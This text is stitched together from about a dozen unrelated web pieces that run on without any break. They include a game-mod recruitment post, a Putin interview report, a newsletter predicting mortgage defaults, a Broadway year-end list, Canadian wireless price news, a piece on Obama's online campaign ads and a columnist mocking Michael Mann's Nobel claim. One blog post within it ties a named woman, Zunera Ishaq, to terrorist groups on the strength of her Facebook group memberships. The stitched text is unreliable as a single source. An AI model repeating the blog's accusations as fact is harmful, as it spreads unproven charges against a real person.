There are also holodisplays that play advertisements about alien beer and such . They are designed to be replayable tutorials of the language system , giving small hints about the verbs that they are using .
Why I think it 's worth a try
The Language System is a complicated one , and probably something one should n't add so far into the development . But the good thing about mod development is that you are allowed to experiment . There are a lot of ideas I try out , which never go too far . With the Language System it was something that I felt right away it would fit in nicely . It helped with the problem of trying to find more good level designers to join and make more level oriented puzzles . The Language System creates puzzles that are more programming and scripting focused , and they focus more on the NPCs than anything else .
You can ask me anything on the From Earth Facebook page or From Earth Twitter profile .
Looking for help
We are looking for any kind of help . While short contributions are welcome as well , we are specifically looking for people who have a little bit more time to spend for From Earth . We are looking for designers to spend more time , and give input on our fighting and item crafting system . We still need to design more puzzles , but we want to focus more on the interactions with the aliens as well as the fighting system .
If you are interested in applying , you can send me a message on Moddb , Twitter , Facebook , or e-mail me at au-heppa @ hlssmod.net .
Gameplay Designer
While we are at the stage where we do n't want to add or change anything big ( we are more likely to remove than add anything ) , we are looking for active help on fine tuning the gameplay . As I am currently the only active designer it 's very hard to get constant feedback on all the different elements of the game . We need someone who has time and interest in the project .
Level Designers
We are looking for two different types of Level Designers . Firstly , we need people that can bring existing levels an aesthetic quality , and are experienced with lighting , texturing , and the general makeup in Hammer . Screenshots and/or example maps are required .
We are also looking for general level designers , such as anyone who has a lot of experience designing different types of puzzles for games like Portal 2 . Source engine or Hammer experience is not necessary . You only need to be able to design levels well , whether it is on paper or Google Sketchup or what ever you find best suited .
Script Editor
We are looking for someone with a bunch of time on and interest on the project to bring the Script and dialogue to good quality . The story includes flashbacks showing a little bit of Zenaida 's backstory and reflects the choices the player has made during the game .
Sound Designer
We are looking for a talented sound designer to create custom sounds for all the alien and human technology .
Concept Artists
Most of the concept work will revolve around the industrial era Alien technology and architecture . Samples of previous work required . We already have a strong set of existing concept art for you to draw on .
Voice actors and actresses
We are currently looking for voice actors to do the female alien voices , as well as human voices including Zenaida 's voice .
The aliens will be speaking an alien language specifically designed for this mod . Their dialogue is partly already written and ready for recording . Examples will be provided if you are interested .
Other
We are interested in getting any help we can get , especially world texture creators and prop modellers .
MOSCOW - President Vladimir Putin says Russia can work with Mitt Romney if he 's elected U.S. president , even though Romney has called Russia the United States ' `` No . 1 geopolitical foe . ''
In an interview broadcast today by the Kremlin-funded Russia Today TV channel , Putin spoke directly about the Republican challenger to President Barack Obama .
`` We 'll work with whichever president is elected by the American people . But our effort will be only as efficient as our partners will want it to be , '' Putin said .
Putin expressed concern about how a Romney presidency would affect the long-running dispute over U.S.-led NATO plans to place elements of a missile-defense system in Europe . Russia contends the system could undermine its own defenses .
Putin said if Romney is elected `` the missile defense system will definitely be directed against Russia . ''
The wide-ranging interview showed Putin 's acerbic and combative side , particularly on the issue of the two-year prison sentence imposed last month on three members of the provocateur band Pussy Riot for their `` punk prayer '' prank in Moscow 's main cathedral entreating the Virgin Mary to save Russia from Putin .
Their conviction brought widespread criticism of Russia for stifling opposition and free speech .
Putin briefly sparred with the English-speaking interviewer over how the band 's name could be translated into Russian , saying `` I think you would n't do it because it sounds too obscene , even in English . ''
Putin also vigorously defended Russia 's stance on the escalating civil war in Syria .
Russia has come under strong criticism in the West for blocking U.N. Security Council resolutions aimed at pressuring Syrian President Bashar Assad 's regime , which is fighting an increasingly vigorous armed opposition . Activists now put the death toll from the uprising that began in March 2011 at between 23,000 and 26,000 .
Russia has said its policy is not aimed at supporting Assad and Putin in the interview gave strong indication that Moscow may have written off the Syrian leader .
`` We realize that this country needs a change , '' he said . `` But this does n't mean that change should come with bloodshed . ''
The Second Wave of Mortgage Defaults
Our economy is about to relapse into the disease that sent us into the Great Depression : Part Deux . Subprime loans caused the initial illness . Option-ARMs will cause the relapse .
In the first half of the past decade , subprime loans were king . They were cheap and easy to get approved . Along with the subprime boom came subprime adjustable-rate mortgages ( ARMs ) , which were equally easy to afford…for a while .
Of course , the “ A ” and the “ R ” in ARM meant that the interest rate borrowers pay changes , or resets . The majority of these resets occurred between the summer of 2007 and the summer of 2008 .
This period saw a massive amount of mortgage interest rate hikes , which caused millions of foreclosures . Things spiraled down from there , eventually freezing nearly all credit and causing the panic of 2008 .
Of course , that 's the 50-cent version of recent history . There were plenty of other financial calamities that went along with this , including the bundling of mortgage-backed securities and risky derivative products .
If you believe the Obama White House and the glass-half-full press corps , you 'd think this mess is now behind us . We are , after all , in a recovery…right ?
Unfortunately , no one is talking about the second wave of ARM resets and foreclosures…
You see , this second wave will come crashing even harder than the first . It 's made up of a type of mortgage called “ Option ARMs. ” These give borrowers the option of how much they want to pay during the first five or 10 years of repayment :
1 ) The full amortized rate , including interest and principal .
2 ) Interest only , or…
3 ) A token payment , well below the amount needed to cover the interest on the loan .
This third option causes the mortgage balance to INCREASE instead of decrease . And usually , the borrower can continue to make minimum payments until the mortgage balance increases to 125 % of the original amount . That 's when the trouble begins…especially if the interest rate increases at the same time .
This is the exact situation in which many homeowners now find themselves .
Obviously , these option ARMs were supposed to be reserved for customers with better credit than those who took out subprime mortgages . But apparently , they were handed out to almost anyone who wanted them .
According to Whitney Tilson and Glenn Tongue of T2 Partners , who are experts on this subject , about 80 % of option ARMs are negatively amortizing . Meaning these so-called top-tier borrowers are heading further into the hole . Once their rates reset , they could be in serious trouble .
And that could be happening very soon :
The chart above shows the two peaks in the mortgage-reset wave . The first peak is comprised of subprime ARM resets . And the second is mostly constructed of option ARM resets . We appear to be in the eye of the storm .
That fact alone shook our nerves when we first discovered it . But it was a different chart in Tilson and Tongue 's most recent presentation that really got us startled… It 's also the reason I 'm predicting the dollar spike in 2010 .
Instead of resetting as expected after the first five years , many option ARMs are so negatively amortized that they are hitting their automatic reset cap .
That means they are resetting early…like right now .
As you can see from the second chart , the expected reset peak was to occur in 2011 . But the real peak is happening now . You can also see that the amount of mortgages resetting is spread over a longer period of time than originally thought , but is peaking much earlier . Unfortunately , it 's not the peaks that matter .
You see , those are just resets . But with unemployment reaching quarter-century highs every month , and the massive number of homeowners about to receive mortgage bills for two to three times what they are used to paying , we find ourselves in an even scarier environment than this time last year .
It takes anywhere between 3-12 months for most homeowners to actually go into foreclosure . Therefore , the wave of Option-ARMs that are now resetting could cause a major wave of foreclosures over the next 6 to 18 months .
It 's tough to say exactly when the storm will come . But my guess is the second half of 2010 .
This second wave of foreclosures will not be good news for the economy or the stock market…At least that 's my guess .
Regards ,
Jim Nelson ,
for The Daily Reckoning
# 021/ # 672
Jimeneon
Stone Eeveelution Fakemon .
Name Origins : Japanese ; Jimen ( earth , ground , patch of land ) + Eon .
Type : Rock
Ability : Reconstitute .
Stage : Stage 1 .
Height : 2 ' 2 ''
Weight : 121 lbs .
Evolution line : Eevee [ Use Hard Stone ] > Jimeneon .
Izaga Dex entry :
Jimeneon are a resilient species and very laid back . If a limb weakens from battle damage or simple every-day deterioration and cracks off , they will bring it back to their trainer and then go out in search of similar stones to shape to their liking . Once a new a limb is readied they will bond to the new pieces over a day and night . It is thought that their ability to mend themselves leads to an incredibly long vitality , and rumors say that some Jimeneon 's date back to the Edo period .
Ability Dex entry : Reconstitute ; if hit by a Rock type move , one tenth of their health is regenerated instead of receiving damage .
7/26 : Tuning up the 'Dex entry .
Base sprites ( c ) Nintendo
Final result ( c ) ZedKalEios
Whether you 're buying or selling a home ( or both ) , your success hinges upon the expert advice and services provided by your real estate agent .
I 'm committed to providing my clients with professional services based on my experience , knowledge and skills .
I 've filled this website with tips and resources to help you quickly understand what you need to know — and how I deliver the services designed to meet your needs .
If you 're selling click here to learn more about the process and how to ensure your property sells quickly and for the highest price possible .
If you 're buying click here to discover how to find your next dream home and get it , without overpaying .
I 'm the agent who specializes in this local market – and has the reputation for putting you , the client , first . Any time you want information on the market or are ready to buy or sell a property – contact me . There 's no obligation .
I 'm looking forward to learning more about your needs and goals .
From the shrieks in much of the British media after Barack Obama 's Nato “ free riders ” remarks you could be forgiven for thinking the president had gone out of his way in an interview with the Atlantic Monthly to criticise Britain , France and other allies for mishandling the bloody shambles which is now Libya .
A pompous French politician popped up on the airwaves to suggest Obama should look in the mirror . “ Obama lays blame for Libya mess on Cameron ” thundered the front page of the Times . Surprise , surprise , the long and thoughtful interview , optimistically billed as The Obama Doctrine , was n't ALL ABOUT US . It is 20,000 words long and if the offending passages occupy more than 800 of them I 'd be amazed . Obama is critical of many people , including the US foreign policy elite and the oil-rich Gulf autocracies .
Obama 's criticism of Cameron reveals president 's own weaknesses Read more
Mind you , when it comes to the Nato allies , Obama is right . Sheltering under the big American umbrella since 1945 , most Europeans have become comfortably well-off and lazy , more concerned with having a nice time than with the basics of self-defence . The richest undefended empire in history – as I like to call the EU – is facing growing problems on its eastern and southern flanks . Both refugees and related violence press on us from Syria , Iraq , and across north Africa to Morocco , and Europe is making a very poor job of tackling them . Of course , we 're free riding .
All this at a time when some idiots think they can float Britain off the continent ( Nato defends us , not the EU , the ninnies tell each other ) and go it alone . What the Obama interview serves to tell us yet again is that this president may still be an internationalist in outlook , but he is much less of one than most since 1945 . Donald Trump and Bernie Sanders – Jeremy Sanders as I like to call him – are doing well against expectations to be the next president . Both are isolationists .
Back to us . Here is one key passage from the Atlantic which upset Fleet Street and the BBC :
“ Free riders ? , ” I interjected . “ Free riders , ” he said , and continued . “ So what I said at that point was , we should act as part of an international coalition . But because this is not at the core of our interests , we need to get a UN mandate ; we need Europeans and Gulf countries to be actively involved in the coalition ; we will apply the military capabilities that are unique to us , but we expect others to carry their weight . And we worked with our defense teams to ensure that we could execute a strategy without putting boots on the ground and without a long-term military commitment in Libya . ”
Note that the journalist , Jeffrey Goldberg , is first to use the expression “ free riders ” , though the president quickly picks it up and endorses it . Washington has made little secret of its European Nato allies cutting their defence budgets to the bone – breaching the 2 % of GDP target – before and after the 2008-09 bankers crisis . Most of them did n't join the Iraq war either . But then , neither did Senator Obama .
That 's one of many reasons why thoughtful Guardian readers may enjoy the interview . Obama is clever , he 's not bombastic about the use of US military power , let alone overextending it in self-defeating ways , as so many in the Washington power elite , civilian and military , are often too keen to do . The US should not bomb people just to show we 're tough , he says . He respects others . As he reminds one Oval Office visitor : “ I 'm black , I was raised by a single mother . I get it . ”
David Cameron was distracted during Libya crisis , says Barack Obama Read more
So Jeremy Corbyn ought to be able to read the piece quite comfortably and agree with most of it . He probably wo n't do either because his mindset seems quite rigid in a 1970s leftist sort of way – I mean that kindly – so he is not comfortable with adult conversations about the US role in the world and the global projection of power . Unserious , you might say .
On the other hand , Conservative readers might regard Obama 's world view as a bit too starry-eyed and Corbynite . The armchair warriors have a point , albeit not a huge one . He really did mess up in Syria in 2012-13 by drawing a “ red line ” against the Assad regime 's use of chemical weapons , then backing off when it was crossed . There was a case for not starting another war when the US remained embroiled in Iraq and Afghanistan , but confusing signals are dangerous to everyone . They start bigger wars – and may yet do around Syria where Russia and Iran cynically have shown less restraint .
Facebook Twitter Pinterest A UN official holds a plastic bag containing samples from the site of an alleged chemical weapons attack in Ain Tarma , Damascu , Syria . Photograph : Stringer/Reuters
Goldberg , who has made a study of the president 's foreign policy , prefers to call Obama a “ Hobbesian optimist ” , someone who thinks the world is a messy and violent place , but that most people are better than they are bad , they want to make it better , to get their kids an education , improve their lives .
Here is the second offending passage :
“ When I go back and I ask myself what went wrong , ” Obama said , “ there 's room for criticism , because I had more faith in the Europeans , given Libya 's proximity , being invested in the follow-up , ” he said . He noted that Nicolas Sarkozy , the French president , lost his job the following year . And he said that British Prime Minister David Cameron soon stopped paying attention , becoming “ distracted by a range of other things ” . Of France , he said , “ Sarkozy wanted to trumpet the flights he was taking in the air campaign , despite the fact that we had wiped out all the air defenses and essentially set up the entire infrastructure ” for the intervention . This sort of bragging was fine , Obama said , because it allowed the US to “ purchase France 's involvement in a way that made it less expensive for us and less risky for us. ” In other words , giving France extra credit in exchange for less risk and cost to the United States was a useful trade-off – except that “ from the perspective of a lot of the folks in the foreign-policy establishment , well , that was terrible . If we 're going to do something , obviously we 've got to be up front , and nobody else is sharing in the spotlight ” . Obama also blamed internal Libyan dynamics ... ”
We could probably all agree that this takes more of a personal potshot at Sarkozy than at Cameron , though this Hawaii-born son of a Kenyan scholarship student has no reason to love us . It seems to be the case that his grandfather was mistreated , possibly tortured , as a Mau Mau terrorist suspect during the nastiest phase of Britain 's imperial retreat in the 1950s . Perhaps an Etonian gave the orders .
Either way , the world we have grown used to and take more or less for granted is unravelling in ways we can not predict . To take just one promising example , did you know that Abdelaziz Bouteflika,79 , Algeria 's authoritarian president , is in poor medical shape ? Nor did I . But we will because there will be the usual nasty power struggle , in which Islamic State , entrenched over the Libyan border in Sirte , may take an interest : the Bouteflika regime is very anti-Islamist .
Algeria is a serious country with a proper army , capable of great brutality , a tradition it inherited from the French occupation . It is also the EU 's third largest supplier of the gas that keeps us warm and busy . If things go wrong just across the Med from Italy we will all hear about it , even if Dave and the Brexit posse want us to “ be distracted by other things ” .
Neil Patrick Harris had a big year on Broadway , starring in 'Hedwig and the Angry Inch . ' Here , he performs a number from the show at the 2014 Tony Awards on June 8 . ( Photo : Robert Deutsch , USA TODAY )
While 2014 saw the loss of two of Broadway 's most duly cherished veterans in director Mike Nichols and performer Elaine Stritch , there were plenty of high points as well , with some stars emerging and others rising further . We take a quick look back at the year in Broadway .
Best play : The Realistic Joneses
Never mind that playwright Will Eno did n't nab a Tony Award nomination for his Broadway debut ; his witty , moving study of human fragility , with its typically idiosyncratic dialogue , was the year 's most genuinely provocative and consistently absorbing entry .
Best musical : The Last Ship
With his first score for musical theater , Sting reaffirmed his melodic and storytelling gifts . He also chose collaborators wisely , with veteran director Joe Mantello and librettists John Logan and Brian Yorkey helping to craft a show that moves and , in the end , surprises us .
Best revivals of a play : A Raisin in the Sun , The Cripple of Inishmaan , The Elephant Man
In a year not lacking for accomplished productions of classics , these three stood out , not for their marquee names ( Denzel Washington , Daniel Radcliffe and Bradley Cooper , respectively — all superb ) , but for bringing very different studies of injustice and courage to searing , soaring new life .
Denzel Washington in ' A Raisin in the Sun , ' Bradley Cooper in 'The Elephant Man ' and Daniel Radcliffe in 'The Cripple of Inishmaan . ' ( Photo : Brigitte Lacombe , Philip Rinaldi Publicity ; Joan Marcus ; Johan Persson , Boneau/Bryan-Brown )
Best revival of a musical : On the Town
Director John Rando , choreographer Joshua Bergasse and music director James Moore — aided by a flawless cast and a full orchestra — found a bittersweet gem in a musical that , despite its sparkling pedigree , some had considered an old chestnut .
Best revival of a performance in a musical : Alan Cumming in Cabaret
As a hilarious , androgynous , chilling Emcee in Roundabout Theatre Company 's previous revival of the Kander and Ebb fave , Cumming made a role that belonged to another beloved theater vet ( Joel Grey ) completely his own . More than 15 years later , Cumming reclaimed the part with a vengeance .
Best triple play : Tony Shalhoub in Act One
A great stage actor ( for those who know him primarily from TV ) , Shalhoub brought humor and humanity to no fewer than three roles , including the playwrights George S. Kaufman and Moss Hart , in James Lapine 's adaptation of Hart 's beloved autobiography .
Person of the year : Neil Patrick Harris in Hedwig and the Angry Inch
With his blazing performance as the titular transgender singer , Harris gave Broadway another big plug — and it returned the favor , awarding him a Tony and propelling the future Oscars host 's star to a new peak .
Breakout stars : Lena Hall in Hedwig and the Angry Inch , Alessandro Nivola in The Elephant Man
Both shared the stage with much bigger names , but Hall 's amazing , shape-shifting voice and wry charisma and Nivola 's commanding , nuanced acting shone just as brightly .
Audra McDonald performs in 'Lady Day at Emerson 's Bar & Grill . ' ( Photo : Evgenia Eliseeva )
Jukebox heroines : Audra McDonald in Lady Day at Emerson 's Bar & Grill , Jessie Mueller in Beautiful : The Carole King Musical
Beautiful was hokey nostalgia , but Mueller stretched her sterling soprano to capture King 's voice and spirit . McDonald , in a more serious-minded tribute to Billie Holiday , carried off another vocal metamorphosis — and won her sixth Tony in the process . ( Mueller earned her first . )
Mr. Genie-ality : James Monroe Iglehart in Aladdin
As the dude who makes the hero 's wishes come true in Disney 's exuberant adaptation of its animated film musical , Iglehart brought joy — and seemingly superhuman energy — to audiences of all ages .
Beautiful `` girls '' : Cast of Casa Valentina
In a year in which LGBT rights were consistently in the headlines , Harvey Fierstein 's play explored the complicated history of cross-dressers , and a group of top-notch actors helped make his characters funny , poignant and real . And looked fabulous in the process .
Read or Share this story : http : //usat.ly/1DPyBHj
Teenagers in Florida are set to be banned by law from wearing low-slung jeans that reveal their underwear .
Senate Bill 228 , also known as the `` Pull Your Pants Up '' Bill , was last week overwhelmingly approved by the state legislature . It is expected to be signed by Governor Rick Scott this week .
The measure prohibits students from wearing clothing that `` exposes their undergarments '' or `` indecently exposes their body parts '' while they are at school .
It is aimed at putting an end to the Hip-Hop-influenced trend , favoured especially by young men , in which jeans are worn around the buttocks rather than the waist .
State Senator Gary Siplin , a Democrat of Orlando and a longstanding advocate of a ban , described it as `` pro-family , pro-education , pro-jobs '' .
`` It is necessary to put the focus back on learning in the classroom , '' said Mr Siplin . `` We can eliminate inappropriate dress as one of the many distractions in public schools today . ''
Pupils would receive a verbal warning on their first breach . For a second offence , a pupil would be banned from extracurricular activities for up to a week and his or her parents would be called in for a meeting .
A third strike , and pupils would be suspended from classes for three days and be banned from extracurricular activities for up to a month .
The country 's biggest wireless providers are pointing to a falling currency to justify raising prices on some rate plans .
Bell , the biggest telecom provider in Canada , has said it will begin charging $ 5 more for certain mobile plans for new customers , citing a “ weakened dollar ” as the reason . Bell , according to a spokesman in a published report , says it 's facing significant cost increases for things like smartphones and network gear , which are bought from foreign companies .
Telus is also reportedly introducing a $ 5 hike on rate plans as of Jan. 21 , owing to “ economic and market conditions , ” factors that were also given by Rogers , which is making similar price hikes to monthly plans .
‘ It makes superficial sense to the average person '
The claims are drawing fire from industry critics who say the increases are n't as much a reflection of rising costs for the carriers , but diminishing competition in an industry dominated nationally by three established giants who historically have avoided competing on price .
The fast-falling dollar is now providing “ a convenient excuse , ” John Lawford , executive director at the Public Interest Advocacy Centre said . “ It makes superficial sense to the average person . ”
Lawford said recent consolidation in the wireless industry has given the national incumbents an opportunity to pressure pricing upward again .
Parallels
Still , a falling loonie is lifting costs for other big Canadian businesses that import hundreds of millions of dollars of goods into the country – ask retailers such as big supermarket chains .
The Canadian dollar has dropped a painful 24.4 per cent against the U.S. dollar since September 2014 .
The costs for equipment for network upgrades and devices are typically converted to U.S. dollars , according to Iain Grant , a telecom analyst with SeaBoard Group .
“ That said , these costs would have been ‘ known knowns ' and a prudent carrier would have off-set much of those foreign currency obligations ” with currency contracts and other hedges , Grant suggested .
“ Another parallel that comes to mind is the ‘ fuel surcharge ' charged by many airlines , even when oil prices are at their [ current lows ] , ” the analyst said .
The rate changes wo n't affect subscribers in the provinces of Quebec , Saskatchewan or Manitoba where the Big Three competes with local cable and phone incumbents Videotron , SaskTel and MTS for wireless customers .
Type in a Google search for the words “ immigration reform , ” and in the split second it takes for your results to pop up , the president 's reelection campaign may begin courting you . Up comes an ad for barack­obama.com , next to the search results .
And if you take the next step and click through to the campaign 's Web site , ads for the president 's reelection may start following you around the Web .
The Obama campaign , and to a lesser extent its GOP rivals , has embraced the potential of the Internet age to reach possible supporters this election season .
The president 's campaign has bought Google advertising space next to all sorts of searches , including “ Warren Buffett , ” “ Obama singing , ” “ Obama birthday ” and , for basketball fans , “ Obama bracket . ”
The assumption is that people interested in those topics may also fit the profile of potential Obama backers , making them perfect targets for a strategically placed ad .
The president is not alone in this . Mitt Romney has bought advertising space next to his father 's name , for example , and Rick Santorum has gone for the term “ Rush Limbaugh , ” according to Hitwise , a company that samples Internet traffic . The ads are rotated on and off the search pages , and campaigns often purchase the ad space for short periods .
Spending for online ads
The Obama campaign is by far the most aggressive in trying to reach voters online , so far spending more on Internet advertising than on television , radio and telemarketing combined . And the president 's campaign has spent five times more on online ads — jumping from $ 2.3 million to $ 12.3 million — than at this point four years ago , when he was running against Hillary Rodham Clinton for the Democratic nomination , federal disclosure records show .
The president 's campaign , which would not discuss its Internet strategy , also is more aggressive in using technology that can track and target people based on the Web sites they 've been browsing , a practice commonly used in corporate advertising .
The candidates are far from abandoning television , direct mail and other marketing strategies , but the competition to find supporters online has rewritten the book on campaigning .
“ If you 're not advertising online , you 're missing out on a huge chunk of people and an ability to influence them , ” said Tim Lim , a former field organizer for Clinton who runs Precision , an ad firm working with Democratic campaigns .
Still , the practice of tracking and targeting people by their characteristics and their behavior on the Web raises the spectre of intrusion .
“ Your browsing and your purchase habits and even the activity of your friends on social networks will influence what a candidate says to you , ” said Ashkan Soltani , an Internet privacy researcher who has consulted for the Federal Trade Commission . “ It 's great to talk to folks about what they want to hear , but the problem is most people do n't know how deeply personalized it is . ”
Consumer advocates for years have raised objections to the sharing of personal data among companies online . And the Obama administration has called for an online “ privacy bill of rights ” that would mean many of the techniques used by the campaign could soon require more transparency and opt-out provisions .
The Obama Web site explains that data submitted by users in response to surveys will be saved and that the campaign will glean and save other information , such as their locations , computer systems and how they came to the site . The data will be used to personalize messages and might be shared with consultants or other campaigns .
But campaign officials say the list of supporters has not been sold or given away except to Organizing for America , a part of the Democratic National Committee created from Obama 's 2008 campaign .
“ As is true with other presidential campaigns , we seek to reach voters with a message that is relevant to them using industry standards of online advertising , ” campaign spokeswoman Katie Hogan said . “ This campaign has and always will be an organization that takes care to protect information that people share with us . ”
More ways to find targets
Since 2008 , advertisers have widely adopted technology that permits targeting commercials to specific segments of users as they move through the Internet .
Four years ago , campaigns typically bought ads from a given Web site based on the demographics of its audience . It also was possible to target audiences by their geographic location , for example , or the text visible on Web pages . So if a campaign wanted to target mothers , it might advertise on a site that suggested baby names or on a page with text about parenting .
That strategy remains , with the Obama campaign blanketing national news sites and those that tend to draw left-leaning viewers , including the New Republic magazine 's and the discussion forum DailyKos , according to ad tracking firm Moat.com .
But new technologies allow the campaign to target specific segments of the electorate , no matter where they are browsing . That is possible because companies tag and track most Internet users as they move around the Web .
When users visit Obama 's campaign site , their browsers submit information to more than a dozen outside advertising companies . Then , as the users move on to other sites , their browsers notify some of the same ad companies , which then place Obama campaign ads on the new site .
By comparison , a visit to Romney 's campaign site triggered communication with five ad companies , while Santorum 's triggered four , according to a recent sampling using publicly available software .
The contacts to outside advertisers also allow “ behavioral marketing , ” through which ad companies use browsing patterns and online surveys to create rich profiles of users , flagging their likely interests , demographic information and , in some cases , their political ideologies . The companies can then place users into categories and offer campaigns the ability to shape their messages for each category .
Some companies have been able to use voter file information to target households with registered voters , even noting which among them are most likely to participate in upcoming elections .
The Obama campaign 's heavy use of the Internet helps explain the increase in support he is getting from donors giving smaller campaign contributions . Those donors often contribute online , using credit cards . One million people donated in the first six months after the campaign launched last year , and the percentage of its funds coming from small donations is higher than it was in Obama 's 2008 campaign .
And those Web users seem to be seizing on a general interest in the president . During the NCAA basketball championships , the campaign bought advertising next to searches for “ Obama bracket. ” Around the time of his 50th birthday in August , the campaign purchased space next to “ Obama birthday ” search results , according to Hitwise .
The keywords also extend to more serious topics . The campaign bought space beside “ Buffett rule ” and “ Warren Buffett ” to draw supporters looking for information on the president 's proposal to raise taxes on high-income earners , a proposal supported by Buffett , who is a billionaire .
The campaign has bought ad space tied to several keywords related to immigration , an area in which the administration has achieved few of its major legislative goals . A search for “ Dream Act ” will bring up an ad linking to a special page on the campaign site dedicated to the legislation by that name , which would provide residency for immigrants who arrive in the United States as minors and go to college or serve in the military . The bill is stalled in the Senate .
Editor 's note : This week , Eco-Libris blogger Raz Goldenik takes a look at a new ( and potentially greener ) method for selling books : by the chapter . This post was originally published on Saturday , February 23 , 2008 .
I read few days ago in Springwise ( a great source to new interesting ideas ) about a new initiative of Random House : Selling books by the chapter .
Random House explains the logic behind the new initiative : “ Sometimes what you want is a slice instead of the whole pie . That 's why we 're offering a new reading experience– the ability to purchase individual chapters . Imagine that ! Downloading and reading exactly the part of a book that meets your needs ” .
The first book to be offered by them is Made to Stick written by Chip Heath and Dan Heath . This book actually looks like a very interesting book . Here 's the book description on its website :
Why do some ideas thrive while others die ? And how do we improve the chances of worthy ideas ? In Made to Stick , accomplished educators and idea collectors Chip and Dan Heath tackle head-on these vexing questions . Inside , the brothers Heath reveals the anatomy of ideas that “ stick ” and explain sure-fire methods for making ideas stickier , such as violating schemas , using the Velcro Theory of Memory , and creating “ curiosity gaps . ”
The process is very simple — on the book 's website you can find a short description of each one of the six chapters of the book and its epilogue . You can choose the chapter that 's right for you and download it as an Adobe Digital Editions file for $ 2.99 . The introduction and index are available for free with the purchase of any chapter .
If you want to purchase the paper version of the book , you can still do it for $ 24.95 ( or the audio CD for $ 29.95 ) .
I like this idea as it generates more incentives for customers to download the book ( or the chapters they are interested at in this case ) instead of buying the paper version .
As Springwise writes , this idea wo n't work for every book , as most books you want to read from page one to the last page , but it can definitely work for guide books , such as Made to Stick .
Random House is already involved for almost two years in a green initiative that is aimed to increase its usage of recycled paper to 30 % by 2010 . I 'm not sure if Random House had the goal of reducing the usage of virgin paper when they came up with their chapters initiative , but it 's definitely going a welcomed by product .
Now we should only see if this initiative will really work . I guess other publishers will wait as well before jumping into the water with similar initiatives . We 'll keep you posted as always .
BREAKING : Niqabi # ZuneraIshaq is member of radical Islamist Jamaat-e-Islami & works 4 # ICNA . Brief note on ICNA ( 1/2 ) pic.twitter.com/obylOe1tWf — Tarek Fatah ( @ TarekFatah ) October 10 , 2015
I have written about the ICNA previously .
A little about the ICNA : “ The press release also recounted some of the views expressed at the aforementioned ICNA meeting . These included an exhortation that “ Islam must be translated into political dominance ” ; pleas for support for “ jihad ” in “ Chechnya , Kashmir , Palestine , Iraq [ against U.S. forces ] , southern Sudan , and … in Bosnia/Kosova [ sic ] ” ; an appeal for unity among Pakistani Muslims against “ Hindu Brahmins and Zionist Jews ” ; and an endorsement of Muslim women 's inclusion in carrying out jihad . ”
Zunera Ishaq is employed by the ICNA Sisters , a branch of the ICNA .
Among the guests at the ICNA affiliated Al Falah Institute aka the Al Falah Islamic Centre , liked by Zunera Ishaq ( see jpeg below ) has been Khalid Yasin , who says Aids was created in America and used by Christian Missionaries to infect Africans .
The Al Falah Islamic Centre also hosted Bilal Phillips and Hakim Quick both of whom have called the murder of gays justified in Islam .
The ICNA dominates the Thorncliffe Park Parents Association . I suspect the ICNA is heavily involved in the anti-sex-ed curriculum demonstrations at the local schools .
Note that one of the Facebook groups that Zunera Ishaq has joined , Jamaat-e-Islami , is the terrorist organization that was being funded by ISNA Canada .
ISNA had it 's charitable status revoked by the CRA for funding the group . Jamaat-e-Islami is recognized as an officially designated terrorist entity by our government .
Zunera Ishaq is affiliated with the ICNA Sisters and also with the MCNA – Muslim Children Of North America , operated by the ICNA Sisters .
I first posted on the ICNA Sisters and the MCNA several years ago , the site has since been stripped of the documents I retain in my possession .
It is a rigid , almost militaristic organization that tracks the habits of its members in a cult like manner as evidenced by this document “ Islamic Circle of North America Canada Sister 's Wing Monthly Individual Report Form for Members ”
Islamic Circle of North America Canada Sister 's Wing Monthly Report
A main focus of the group is Dawah or calling to the faith , missionary work as a Christian might describe it . The methodology is explained in the following document : Islamic Circle of North America Canada Sister 's Wing – Dawah
Islamic Circle of North America Canada Sister 's Wing -Dawah
I find it odd that the MCNA makes no mention of the veil being a requirement for students . In fact it is explicitly stated that the face and hands are not to covered in this document , Proper Islamic Clothing for Girls , ( see link below ) , secured from the MCNA site at the time of my original post , which may be read here .
Proper Islamic Clothing for Girls
Zunera Ishaq belongs to a Quran Study Group , you can see it listed in the “ Group ” section of her Facebook page posted above .
The name of the group is مطالعہ تفہیم القرآن roughly translated to Quran Study .
The group 's timeline is filled with Jihadist propaganda , such as the post I screen-grabbed below .
The English translation reveals the terror group named as Jaish-e-Mohammad , a Kashmir based Muslim terrorist organization .
Zunera Ishaq also belongs to the Facebook group Students of Islam , you can see her Facebook group memberships in the jpeg posted above . I learned from this group that David Ben Gurion blackmailed David Rockefeller to ensure Israel had enough UN votes to be recognized as a state .
A few readers have asked for my reaction to the news that climatologist Michael Mann has decided to proceed with his suit against NR , me , Rand Simberg and the Competitive Enterprise Institute for mocking his hockey stick .
I 'm still working on my formal , bland , carefully lawyered official response , so for now just let me do cheap ad hominem cracks .
I was intrigued to see in Dr. Mann 's press release of his suit the following biographical detail :
Dr. Mann is a climate scientist whose research has focused on global warming . In 2007 , along with Vice President Al Gore and his colleagues of the Intergovernmental Panel on Climate Change , he was awarded the Nobel Peace Prize for having “ created an ever-broader informed consensus about the connection between human activities and global warming . ”
Advertisement
Advertisement
I confess I was n't aware Dr. Mann “ was awarded the Nobel Peace Prize. ” The official Nobel site makes no mention of him ; there are no speeches , no citations , no pictures of him with the King of Norway , no namecheck on the 2007 Nobel diploma .
But it 's true he contributed to the work of the Intergovernmental Panel on Climate Change . And as the IPCC says :
Thousands of scientists from all over the world contribute to the work of the IPCC on a voluntary basis as authors , contributors and reviewers .
In 2007 , Dr Mann was one of approximately 700 reviewers to review the findings of approximately 600 authors of one working group of the Fourth Assessment Report . However , he was one of a select group of a mere 2,000 people to receive a “ commemorative certificate of involvement ” — not from the Nobel committee , but from Dr Rajendra Pachauri of the IPCC .
So , in that sense , yes , indeed , he “ was awarded the Nobel Peace Prize. ” Phew . For a moment , I was worried he might be exaggerating a bit — bending the curve upwards , so to speak .
Advertisement
Advertisement
In the same spirit , I see that I 've just been awarded the 2012 Nobel Peace Prize . Under Ireland 's citizenship law , I 'm an Irish national ( through my father ) . Ireland is a member of the European Union . The EU has just been given the Nobel Peace Prize . QED . Come to think of it , my mother 's Belgian , so I 've been awarded two Nobel Peace Prizes .
Advertisement
I defer to the expertise of my colleague Jay Nordlinger in these matters , but I believe this will be an historic trial : The first time one Nobel Peace Prize winner has sued another Nobel Peace Prize winner — at least until Obama sues Rigoberta Menchu over who 's got the fakest fake memoir . I 'll bring my Nobel medal if Dr. Mann brings his .
P.S . Given that the New York Times is calling this a 21st-century Scopes monkey trial , I rather like Steve Kates 's ingenious headline Down Under : “ Inherit The Wind Farm . ”
